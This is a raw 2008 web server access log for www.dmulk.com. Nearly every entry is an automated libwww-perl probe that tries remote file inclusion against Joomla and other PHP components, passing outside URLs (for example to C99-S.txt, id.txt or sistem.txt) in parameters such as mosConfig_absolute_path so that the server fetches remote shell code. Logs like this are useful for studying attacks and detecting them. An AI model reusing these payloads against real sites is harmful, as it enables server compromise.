64.141.103.91 - - [08/Apr/2008:14:50:15 -0700] "GET /logs//index.php?option=frontpage&Itemid=system(uname)http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.238.142.186 - - [08/Apr/2008:14:50:22 -0700] "GET /logs/access_080329.log/lostpw.php?FORM%5Bset%5D=1&FORM%5Bsession_id%5D=1&CONFIG%5Bpath%5D=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [08/Apr/2008:14:50:22 -0700] "GET /lostpw.php?FORM%5Bset%5D=1&FORM%5Bsession_id%5D=1&CONFIG%5Bpath%5D=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
199.238.142.186 - - [08/Apr/2008:14:50:22 -0700] "GET /logs/lostpw.php?FORM%5Bset%5D=1&FORM%5Bsession_id%5D=1&CONFIG%5Bpath%5D=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:50:53 -0700] "GET /logs/access_080207.log/components/com_joomlaboard/file_upload.php?sbp=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:50:53 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:50:54 -0700] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:51:01 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:51:02 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:51:11 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:51:11 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:51:11 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:51:30 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:14:51:37 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:14:51:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:52:38 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:52:53 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:52:53 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:52:54 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:14:53:00 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:14:53:03 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:14:53:03 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:53:12 -0700] "GET /logs/access.log/index2.php?content=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:53:16 -0700] "GET /index2.php?content=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:53:16 -0700] "GET /logs/index2.php?content=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:53:21 -0700] "GET //public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:53:32 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:53:54 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:14:53:59 -0700] "GET /logs/access_080225.log/index2.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:14:54:09 -0700] "GET /index2.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:54:09 -0700] "GET /logs/access_080218.log//public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:54:09 -0700] "GET //errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:54:09 -0700] "GET //public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:54:10 -0700] "GET /logs//public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:54:10 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:14:54:18 -0700] "GET /logs/index2.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:54:54 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:54:54 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:54:54 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.235.216.127 - - [08/Apr/2008:14:54:56 -0700] "GET /avatar.php?page=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.47 - - [08/Apr/2008:14:55:01 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [08/Apr/2008:14:55:02 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.47 - - [08/Apr/2008:14:55:02 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:55:03 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:55:03 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:55:04 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:55:08 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:14:55:13 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:55:45 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:55:54 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:55:55 -0700] "GET //public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:56:18 -0700] "GET /logs/access_080329.log/components/com_joomlaboard/file_upload.php?sbp=http://www.buyindianproducts.com/includes/font/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:56:46 -0700] "GET /logs/access_080312.log//public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:56:51 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:57:03 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:57:21 -0700] "GET /logs/access_080329.log/index2.php?content=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:14:57:21 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:14:57:23 -0700] "GET //ashnews.php?pathtoashnews=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:14:57:23 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.179.254 - - [08/Apr/2008:14:57:43 -0700] "GET /logs/access_080309.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:57:55 -0700] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:14:58:10 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.76" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:14:58:10 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:14:58:11 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:14:58:12 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:14:58:33 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:14:58:34 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:14:58:34 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:58:34 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:58:35 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:58:35 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:59:03 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.122 - - [08/Apr/2008:14:59:10 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:59:12 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:14:59:12 -0700] "GET //ashnews.php?pathtoashnews=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:59:13 -0700] "GET //errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:59:13 -0700] "GET /logs//errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.27.159 - - [08/Apr/2008:14:59:15 -0700] "GET /logs/access_070830.log HTTP/1.0" 200 30370 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:59:16 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:59:16 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:59:17 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:14:59:27 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:14:59:27 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:14:59:29 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:14:59:30 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:14:59:40 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:14:59:42 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:59:53 -0700] "GET /logs/access_080218.log/_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:15:00:00 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:15:00:01 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.21.161 - - [08/Apr/2008:15:00:02 -0700] "GET /logs/access_071127.log HTTP/1.0" 200 203829 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:15:00:03 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:00:03 -0700] "GET //public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:15:01:04 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:01:18 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:01:27 -0700] "GET //errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:01:33 -0700] "GET /logs/access_080218.log//public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:01:37 -0700] "GET //public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:01:37 -0700] "GET /logs//public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:15:01:50 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:15:01:57 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:15:02:29 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:15:02:36 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.72.52 - - [08/Apr/2008:15:02:36 -0700] "GET /logs/access_080313.log/index.php?pag=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
